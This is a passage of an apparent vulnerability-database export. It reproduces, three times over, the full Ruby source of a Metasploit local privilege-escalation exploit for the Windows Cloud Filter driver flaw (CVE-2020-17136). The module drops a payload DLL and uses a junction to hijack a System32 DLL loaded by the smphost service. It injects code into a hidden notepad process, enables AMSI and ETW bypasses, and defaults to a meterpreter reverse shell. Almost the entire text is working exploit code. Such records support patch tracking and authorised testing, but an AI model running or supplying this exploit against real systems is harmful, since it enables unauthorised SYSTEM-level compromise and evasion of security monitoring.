get_dotnet_versions\n vprint_status(\"Dot Net Versions installed on target: #{installed_dotnet_versions}\")\n if installed_dotnet_versions == []\n fail_with(Failure::BadConfig, 'Target has no .NET framework installed')\n end\n if check_requirements('v4.0.30319', installed_dotnet_versions) == false\n fail_with(Failure::BadConfig, 'CLR required for assembly not installed')\n end\n payload_path = \"C:\\\\Windows\\\\Temp\\\\#{rand_text_alpha(16)}.dll\"\n print_status(\"Dropping payload dll at #{payload_path} and registering it for cleanup...\")\n write_file(payload_path, generate_payload_dll)\n register_file_for_cleanup(payload_path)\n execute_assembly(exe_path, \"#{path_to_intermediate_dir} #{junction_dir}\\\\Windows\\\\System32\\\\healthapi.dll #{payload_path}\")\n service_start('smphost')\n register_file_for_cleanup('C:\\\\Windows\\\\System32\\\\healthapi.dll')\n sleep(3)\n delete_mount_point(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\", mount_handle)\n end\n\n def pid_exists(pid)\n mypid = client.sys.process.getpid.to_i\n\n if pid == mypid\n print_bad('Cannot select the current process as the injection target')\n return false\n end\n\n host_processes = client.sys.process.get_processes\n if host_processes.empty?\n print_bad('No running processes found on the target host.')\n return false\n end\n\n theprocess = host_processes.find { |x| x['pid'] == pid }\n\n !theprocess.nil?\n end\n\n def launch_process\n process_name = 'notepad.exe'\n print_status(\"Launching #{process_name} to host CLR...\")\n\n process = client.sys.process.execute(process_name, nil, {\n 'Channelized' => true,\n 'Hidden' => true,\n 'UseThreadToken' => true,\n 'ParentPid' => 0\n })\n hprocess = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{hprocess.pid} launched.\")\n [process, hprocess]\n end\n\n def inject_hostclr_dll(process)\n print_status(\"Reflectively injecting the Host DLL into #{process.pid}..\")\n\n library_path = 
::File.join(Msf::Config.data_directory, 'post', 'execute-dotnet-assembly', 'HostingCLRx64.dll')\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Injecting Host into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n [exploit_mem, offset]\n end\n\n def execute_assembly(exe_path, exe_args)\n if sysinfo.nil?\n fail_with(Failure::BadConfig, 'Session invalid')\n else\n print_status(\"Running module against #{sysinfo['Computer']}\")\n end\n if datastore['WAIT'].zero?\n print_warning('Output unavailable as wait time is 0')\n end\n\n process, hprocess = launch_process\n exploit_mem, offset = inject_hostclr_dll(hprocess)\n\n assembly_mem = copy_assembly(exe_path, hprocess, exe_args)\n\n print_status('Executing...')\n hprocess.thread.create(exploit_mem + offset, assembly_mem)\n\n if datastore['WAIT'].positive?\n sleep(datastore['WAIT'])\n read_output(process)\n end\n\n if datastore['KILL']\n print_good(\"Killing process #{hprocess.pid}\")\n client.sys.process.kill(hprocess.pid)\n end\n\n print_good('Execution finished.')\n end\n\n def copy_assembly(exe_path, process, exe_args)\n print_status(\"Host injected. Copy assembly into #{process.pid}...\")\n int_param_size = 8\n sign_flag_size = 1\n amsi_flag_size = 1\n etw_flag_size = 1\n assembly_size = File.size(exe_path)\n\n cln_params = ''\n cln_params << exe_args\n cln_params << \"\\x00\"\n\n payload_size = amsi_flag_size + etw_flag_size + sign_flag_size + int_param_size\n payload_size += assembly_size + cln_params.length\n assembly_mem = process.memory.allocate(payload_size, PAGE_READWRITE)\n params = [\n assembly_size,\n cln_params.length,\n datastore['AMSIBYPASS'] ? 1 : 0,\n datastore['ETWBYPASS'] ? 
1 : 0,\n 2\n ].pack('IICCC')\n params += cln_params\n\n process.memory.write(assembly_mem, params + File.read(exe_path, mode: 'rb'))\n print_status('Assembly copied.')\n assembly_mem\n end\n\n def read_output(process)\n print_status('Start reading output')\n old_timeout = client.response_timeout\n client.response_timeout = 5\n\n begin\n loop do\n output = process.channel.read\n if !output.nil? && !output.empty?\n output.split(\"\\n\").each { |x| print_good(x) }\n end\n break if output.nil? || output.empty?\n end\n rescue Rex::TimeoutError\n vprint_warning('Time out exception: wait limit exceeded (5 sec)')\n rescue ::StandardError => e\n print_error(\"Exception: #{e.inspect}\")\n end\n\n client.response_timeout = old_timeout\n print_status('End output.')\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2020_17136.rb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-01-12T16:47:37", "description": "", "cvss3": {}, "published": "2021-01-12T00:00:00", "type": "packetstorm", "title": "Cloud Filter Arbitrary File Creation / Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-1170", "CVE-2020-17136"], "modified": "2021-01-12T00:00:00", "id": "PACKETSTORM:160919", "href": "https://packetstormsecurity.com/files/160919/Cloud-Filter-Arbitrary-File-Creation-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \ninclude Exploit::EXE \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::ReflectiveDLLInjection \ninclude Msf::Post::Windows::Dotnet \ninclude Msf::Post::Windows::Services \ninclude Msf::Post::Windows::FileSystem \ninclude Msf::Exploit::FileDropper 
\nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP', \n'Description' => %q{ \nThe Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December \n2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when \ncalling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() \nfunction with attacker controlled input. This meant that files were created with \nKernelMode permissions, thereby bypassing any security checks that would otherwise \nprevent a normal user from being able to create files in directories \nthey don't have permissions to create files in. \n \nThis module abuses this vulnerability to perform a DLL hijacking attack against the \nMicrosoft Storage Spaces SMP service, which grants the attacker code execution as the \nNETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one \nof the Meterpreter payloads, as doing so will allow them to subsequently escalate their \nnew session from NETWORK SERVICE to SYSTEM by using Meterpreter's \"getsystem\" command \nto perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'James Forshaw', # Vulnerability discovery and PoC creator \n'Grant Willcox' # Metasploit module \n], \n'Platform' => ['win'], \n'SessionTypes' => ['meterpreter'], \n'Privileged' => true, \n'Arch' => [ARCH_X64], \n'Targets' => \n[ \n[ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2020-03-10', \n'References' => [ \n['CVE', '2020-17136'], \n['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=2082'], \n['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17136'] \n], \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'Stability' => [ CRASH_SAFE ] \n}, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n} \n) \n) \nregister_options( \n[ \nOptBool.new('AMSIBYPASS', [true, 'Enable Amsi bypass', true]), \nOptBool.new('ETWBYPASS', [true, 'Enable Etw bypass', true]), \nOptInt.new('WAIT', [false, 'Time in seconds to wait', 5]) \n], self.class \n) \n \nregister_advanced_options( \n[ \nOptBool.new('KILL', [true, 'Kill the injected process at the end of the task', false]) \n] \n) \nend \n \ndef check_requirements(clr_req, installed_dotnet_versions) \ninstalled_dotnet_versions.each do |fi| \nif clr_req == 'v4.0.30319' \nif fi[0] == '4' \nvprint_status('Requirements ok') \nreturn true \nend \nelsif fi[0] == '3' \nvprint_status('Requirements ok') \nreturn true \nend \nend \nprint_error('Required dotnet version not present') \nfalse \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!') \nend \n \nbuild_num_raw = cmd_exec('cmd.exe /c ver') \nbuild_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/) \nif build_num.nil? 
\nreturn CheckCode::Unknown(\"Couldn't retrieve the target's build number!\") \nelse \nbuild_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0] \nvprint_status(\"Target's build number: #{build_num}\") \nend \n \nbuild_num_gemversion = Gem::Version.new(build_num) \n# Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/ \nif (build_num_gemversion >= Gem::Version.new('10.0.19042.0')) && (build_num_gemversion < Gem::Version.new('10.0.19042.685')) # Windows 10 20H2 \nreturn CheckCode::Appears('A vulnerable Windows 10 20H2 build was detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.19041.0')) && (build_num_gemversion < Gem::Version.new('10.0.19041.685')) # Windows 10 v2004 aka 20H1 \nreturn CheckCode::Appears('A vulnerable Windows 10 20H1 build was detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.1256')) # Windows 10 v1909 \nreturn CheckCode::Appears('A vulnerable Windows 10 v1909 build was detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.1256')) # Windows 10 v1903 \nreturn CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1637')) # Windows 10 v1809 \nreturn CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1902')) # Windows 10 v1803 \nreturn CheckCode::Appears('A vulnerable Windows 10 v1803 build was detected!') \nelse \nreturn CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!') \nend \nend \n \ndef exploit \nif sysinfo['Architecture'] != 'x64' \nfail_with(Failure::NoTarget, 'This module currently only 
supports targeting x64 systems!') \nelsif session.arch != 'x64' \nfail_with(Failure::NoTarget, 'Sorry, WoW64 is not supported at this time!') \nend \ndir_junct_path = 'C:\\\\Windows\\\\Temp' \nintermediate_dir = rand_text_alpha(10).to_s \njunction_dir = rand_text_alpha(10).to_s \npath_to_intermediate_dir = \"#{dir_junct_path}\\\\#{intermediate_dir}\" \n \nmkdir(\"#{path_to_intermediate_dir}\") \nif !directory?(\"#{path_to_intermediate_dir}\") \nfail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!') \nend \nregister_dir_for_cleanup(\"#{path_to_intermediate_dir}\") \n \nmkdir(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\") \nif !directory?(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\") \nfail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!') \nend \n \nmount_handle = create_mount_point(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\", 'C:\\\\') \nif !directory?(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\") \nfail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!') \nend \n \nexe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe' \nunless File.file?(exe_path) \nfail_with(Failure::BadConfig, 'Assembly not found') \nend \ninstalled_dotnet_versions = get_dotnet_versions \nvprint_status(\"Dot Net Versions installed on target: #{installed_dotnet_versions}\") \nif installed_dotnet_versions == [] \nfail_with(Failure::BadConfig, 'Target has no .NET framework installed') \nend \nif check_requirements('v4.0.30319', installed_dotnet_versions) == false \nfail_with(Failure::BadConfig, 'CLR required for assembly not installed') \nend \npayload_path = \"C:\\\\Windows\\\\Temp\\\\#{rand_text_alpha(16)}.dll\" \nprint_status(\"Dropping payload dll at #{payload_path} and registering it for cleanup...\") \nwrite_file(payload_path, generate_payload_dll) \nregister_file_for_cleanup(payload_path) \nexecute_assembly(exe_path, \"#{path_to_intermediate_dir} 
#{junction_dir}\\\\Windows\\\\System32\\\\healthapi.dll #{payload_path}\") \nservice_start('smphost') \nregister_file_for_cleanup('C:\\\\Windows\\\\System32\\\\healthapi.dll') \nsleep(3) \ndelete_mount_point(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\", mount_handle) \nend \n \ndef pid_exists(pid) \nmypid = client.sys.process.getpid.to_i \n \nif pid == mypid \nprint_bad('Cannot select the current process as the injection target') \nreturn false \nend \n \nhost_processes = client.sys.process.get_processes \nif host_processes.empty? \nprint_bad('No running processes found on the target host.') \nreturn false \nend \n \ntheprocess = host_processes.find { |x| x['pid'] == pid } \n \n!theprocess.nil? \nend \n \ndef launch_process \nprocess_name = 'notepad.exe' \nprint_status(\"Launching #{process_name} to host CLR...\") \n \nprocess = client.sys.process.execute(process_name, nil, { \n'Channelized' => true, \n'Hidden' => true, \n'UseThreadToken' => true, \n'ParentPid' => 0 \n}) \nhprocess = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{hprocess.pid} launched.\") \n[process, hprocess] \nend \n \ndef inject_hostclr_dll(process) \nprint_status(\"Reflectively injecting the Host DLL into #{process.pid}..\") \n \nlibrary_path = ::File.join(Msf::Config.data_directory, 'post', 'execute-dotnet-assembly', 'HostingCLRx64.dll') \nlibrary_path = ::File.expand_path(library_path) \n \nprint_status(\"Injecting Host into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \n[exploit_mem, offset] \nend \n \ndef execute_assembly(exe_path, exe_args) \nif sysinfo.nil? \nfail_with(Failure::BadConfig, 'Session invalid') \nelse \nprint_status(\"Running module against #{sysinfo['Computer']}\") \nend \nif datastore['WAIT'].zero? 
\nprint_warning('Output unavailable as wait time is 0') \nend \n \nprocess, hprocess = launch_process \nexploit_mem, offset = inject_hostclr_dll(hprocess) \n \nassembly_mem = copy_assembly(exe_path, hprocess, exe_args) \n \nprint_status('Executing...') \nhprocess.thread.create(exploit_mem + offset, assembly_mem) \n \nif datastore['WAIT'].positive? \nsleep(datastore['WAIT']) \nread_output(process) \nend \n \nif datastore['KILL'] \nprint_good(\"Killing process #{hprocess.pid}\") \nclient.sys.process.kill(hprocess.pid) \nend \n \nprint_good('Execution finished.') \nend \n \ndef copy_assembly(exe_path, process, exe_args) \nprint_status(\"Host injected. Copy assembly into #{process.pid}...\") \nint_param_size = 8 \nsign_flag_size = 1 \namsi_flag_size = 1 \netw_flag_size = 1 \nassembly_size = File.size(exe_path) \n \ncln_params = '' \ncln_params << exe_args \ncln_params << \"\\x00\" \n \npayload_size = amsi_flag_size + etw_flag_size + sign_flag_size + int_param_size \npayload_size += assembly_size + cln_params.length \nassembly_mem = process.memory.allocate(payload_size, PAGE_READWRITE) \nparams = [ \nassembly_size, \ncln_params.length, \ndatastore['AMSIBYPASS'] ? 1 : 0, \ndatastore['ETWBYPASS'] ? 1 : 0, \n2 \n].pack('IICCC') \nparams += cln_params \n \nprocess.memory.write(assembly_mem, params + File.read(exe_path)) \nprint_status('Assembly copied.') \nassembly_mem \nend \n \ndef read_output(process) \nprint_status('Start reading output') \nold_timeout = client.response_timeout \nclient.response_timeout = 5 \n \nbegin \nloop do \noutput = process.channel.read \nif !output.nil? && !output.empty? \noutput.split(\"\\n\").each { |x| print_good(x) } \nend \nbreak if output.nil? || output.empty? 
\nend \nrescue Rex::TimeoutError \nvprint_warning('Time out exception: wait limit exceeded (5 sec)') \nrescue ::StandardError => e \nprint_error(\"Exception: #{e.inspect}\") \nend \n \nclient.response_timeout = old_timeout \nprint_status('End output.') \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/160919/cve_2020_17136.rb.txt", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-23T07:26:15", "description": "This Metasploit module exploits a vulnerability in cldflt.sys. The Cloud Filter driver on Windows 10 v1803 and later, prior to the December 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any security checks that would otherwise prevent a normal user from being able to create files in directories they don't have permissions to create files in. This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. 
Users are strongly encouraged to set the PAYLOAD option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from NETWORK SERVICE to SYSTEM by using Meterpreter's \"getsystem\" command to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "zdt", "title": "Cloud Filter Arbitrary File Creation / Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17136", "CVE-2020-1170"], "modified": "2021-01-12T00:00:00", "id": "1337DAY-ID-35669", "href": "https://0day.today/exploit/description/35669", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n include Exploit::EXE\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Post::Windows::Dotnet\n include 
Msf::Post::Windows::Services\n include Msf::Post::Windows::FileSystem\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',\n 'Description' => %q{\n The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December\n 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when\n calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()\n function with attacker controlled input. This meant that files were created with\n KernelMode permissions, thereby bypassing any security checks that would otherwise\n prevent a normal user from being able to create files in directories\n they don't have permissions to create files in.\n\n This module abuses this vulnerability to perform a DLL hijacking attack against the\n Microsoft Storage Spaces SMP service, which grants the attacker code execution as the\n NETWORK SERVICE user. 
Users are strongly encouraged to set the PAYLOAD option to one\n of the Meterpreter payloads, as doing so will allow them to subsequently escalate their\n new session from NETWORK SERVICE to SYSTEM by using Meterpreter's \"getsystem\" command\n to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'James Forshaw', # Vulnerability discovery and PoC creator\n 'Grant Willcox' # Metasploit module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Privileged' => true,\n 'Arch' => [ARCH_X64],\n 'Targets' =>\n [\n [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-03-10',\n 'References' => [\n ['CVE', '2020-17136'],\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=2082'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17136']\n ],\n 'Notes' =>\n {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n }\n )\n )\n register_options(\n [\n OptBool.new('AMSIBYPASS', [true, 'Enable Amsi bypass', true]),\n OptBool.new('ETWBYPASS', [true, 'Enable Etw bypass', true]),\n OptInt.new('WAIT', [false, 'Time in seconds to wait', 5])\n ], self.class\n )\n\n register_advanced_options(\n [\n OptBool.new('KILL', [true, 'Kill the injected process at the end of the task', false])\n ]\n )\n end\n\n def check_requirements(clr_req, installed_dotnet_versions)\n installed_dotnet_versions.each do |fi|\n if clr_req == 'v4.0.30319'\n if fi[0] == '4'\n vprint_status('Requirements ok')\n return true\n end\n elsif fi[0] == '3'\n vprint_status('Requirements ok')\n return true\n end\n end\n print_error('Required dotnet version not present')\n false\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n if 
sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n build_num_raw = cmd_exec('cmd.exe /c ver')\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)\n if build_num.nil?\n return CheckCode::Unknown(\"Couldn't retrieve the target's build number!\")\n else\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0]\n vprint_status(\"Target's build number: #{build_num}\")\n end\n\n build_num_gemversion = Gem::Version.new(build_num)\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/\n if (build_num_gemversion >= Gem::Version.new('10.0.19042.0')) && (build_num_gemversion < Gem::Version.new('10.0.19042.685')) # Windows 10 20H2\n return CheckCode::Appears('A vulnerable Windows 10 20H2 build was detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.19041.0')) && (build_num_gemversion < Gem::Version.new('10.0.19041.685')) # Windows 10 v2004 aka 20H1\n return CheckCode::Appears('A vulnerable Windows 10 20H1 build was detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.1256')) # Windows 10 v1909\n return CheckCode::Appears('A vulnerable Windows 10 v1909 build was detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.1256')) # Windows 10 v1903\n return CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1637')) # Windows 10 v1809\n return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1902')) # Windows 10 v1803\n 
return CheckCode::Appears('A vulnerable Windows 10 v1803 build was detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def exploit\n if sysinfo['Architecture'] != 'x64'\n fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')\n elsif session.arch != 'x64'\n fail_with(Failure::NoTarget, 'Sorry, WoW64 is not supported at this time!')\n end\n dir_junct_path = 'C:\\\\Windows\\\\Temp'\n intermediate_dir = rand_text_alpha(10).to_s\n junction_dir = rand_text_alpha(10).to_s\n path_to_intermediate_dir = \"#{dir_junct_path}\\\\#{intermediate_dir}\"\n\n mkdir(\"#{path_to_intermediate_dir}\")\n if !directory?(\"#{path_to_intermediate_dir}\")\n fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')\n end\n register_dir_for_cleanup(\"#{path_to_intermediate_dir}\")\n\n mkdir(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\")\n if !directory?(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\")\n fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!')\n end\n\n mount_handle = create_mount_point(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\", 'C:\\\\')\n if !directory?(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\")\n fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')\n end\n\n exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'\n unless File.file?(exe_path)\n fail_with(Failure::BadConfig, 'Assembly not found')\n end\n installed_dotnet_versions = get_dotnet_versions\n vprint_status(\"Dot Net Versions installed on target: #{installed_dotnet_versions}\")\n if installed_dotnet_versions == []\n fail_with(Failure::BadConfig, 'Target has no .NET framework installed')\n end\n if check_requirements('v4.0.30319', installed_dotnet_versions) == false\n fail_with(Failure::BadConfig, 'CLR required for assembly not installed')\n end\n 
payload_path = \"C:\\\\Windows\\\\Temp\\\\#{rand_text_alpha(16)}.dll\"\n print_status(\"Dropping payload dll at #{payload_path} and registering it for cleanup...\")\n write_file(payload_path, generate_payload_dll)\n register_file_for_cleanup(payload_path)\n execute_assembly(exe_path, \"#{path_to_intermediate_dir} #{junction_dir}\\\\Windows\\\\System32\\\\healthapi.dll #{payload_path}\")\n service_start('smphost')\n register_file_for_cleanup('C:\\\\Windows\\\\System32\\\\healthapi.dll')\n sleep(3)\n delete_mount_point(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\", mount_handle)\n end\n\n def pid_exists(pid)\n mypid = client.sys.process.getpid.to_i\n\n if pid == mypid\n print_bad('Cannot select the current process as the injection target')\n return false\n end\n\n host_processes = client.sys.process.get_processes\n if host_processes.empty?\n print_bad('No running processes found on the target host.')\n return false\n end\n\n theprocess = host_processes.find { |x| x['pid'] == pid }\n\n !theprocess.nil?\n end\n\n def launch_process\n process_name = 'notepad.exe'\n print_status(\"Launching #{process_name} to host CLR...\")\n\n process = client.sys.process.execute(process_name, nil, {\n 'Channelized' => true,\n 'Hidden' => true,\n 'UseThreadToken' => true,\n 'ParentPid' => 0\n })\n hprocess = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{hprocess.pid} launched.\")\n [process, hprocess]\n end\n\n def inject_hostclr_dll(process)\n print_status(\"Reflectively injecting the Host DLL into #{process.pid}..\")\n\n library_path = ::File.join(Msf::Config.data_directory, 'post', 'execute-dotnet-assembly', 'HostingCLRx64.dll')\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Injecting Host into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n [exploit_mem, offset]\n end\n\n def execute_assembly(exe_path, exe_args)\n if sysinfo.nil?\n fail_with(Failure::BadConfig, 'Session 
invalid')\n else\n print_status(\"Running module against #{sysinfo['Computer']}\")\n end\n if datastore['WAIT'].zero?\n print_warning('Output unavailable as wait time is 0')\n end\n\n process, hprocess = launch_process\n exploit_mem, offset = inject_hostclr_dll(hprocess)\n\n assembly_mem = copy_assembly(exe_path, hprocess, exe_args)\n\n print_status('Executing...')\n hprocess.thread.create(exploit_mem + offset, assembly_mem)\n\n if datastore['WAIT'].positive?\n sleep(datastore['WAIT'])\n read_output(process)\n end\n\n if datastore['KILL']\n print_good(\"Killing process #{hprocess.pid}\")\n client.sys.process.kill(hprocess.pid)\n end\n\n print_good('Execution finished.')\n end\n\n def copy_assembly(exe_path, process, exe_args)\n print_status(\"Host injected. Copy assembly into #{process.pid}...\")\n int_param_size = 8\n sign_flag_size = 1\n amsi_flag_size = 1\n etw_flag_size = 1\n assembly_size = File.size(exe_path)\n\n cln_params = ''\n cln_params << exe_args\n cln_params << \"\\x00\"\n\n payload_size = amsi_flag_size + etw_flag_size + sign_flag_size + int_param_size\n payload_size += assembly_size + cln_params.length\n assembly_mem = process.memory.allocate(payload_size, PAGE_READWRITE)\n params = [\n assembly_size,\n cln_params.length,\n datastore['AMSIBYPASS'] ? 1 : 0,\n datastore['ETWBYPASS'] ? 1 : 0,\n 2\n ].pack('IICCC')\n params += cln_params\n\n process.memory.write(assembly_mem, params + File.read(exe_path))\n print_status('Assembly copied.')\n assembly_mem\n end\n\n def read_output(process)\n print_status('Start reading output')\n old_timeout = client.response_timeout\n client.response_timeout = 5\n\n begin\n loop do\n output = process.channel.read\n if !output.nil? && !output.empty?\n output.split(\"\\n\").each { |x| print_good(x) }\n end\n break if output.nil? 
